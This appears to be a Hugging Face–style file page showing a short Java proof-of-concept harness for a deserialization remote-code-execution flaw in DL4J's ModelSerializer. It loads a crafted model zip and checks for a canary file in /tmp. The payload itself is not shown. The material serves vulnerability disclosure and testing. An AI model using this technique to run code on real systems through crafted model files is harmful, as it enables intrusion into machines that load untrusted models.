krishprober's picture
DL4J ModelSerializer deserialization RCE PoC (preprocessor.bin)
db9ffe9
Raw
History Blame Contribute Delete
670 Bytes
import org.deeplearning4j.util.ModelSerializer;
import java.io.File;
public class LoadPoc {
public static void main(String[] a) throws Exception {
// The "victim" action: load a model file with the standard DL4J API.
System.out.println("[*] loading malicious-model.zip via ModelSerializer.restoreMultiLayerNetwork ...");
try { ModelSerializer.restoreMultiLayerNetwork(new File("malicious-model.zip")); }
catch (Throwable t) { System.out.println("[*] (cast/parse error after deserialization is expected): " + t.getClass().getSimpleName()); }
System.out.println("[*] check for /tmp/DL4J_RCE_CANARY -> if present, code ran during model load.");
}
}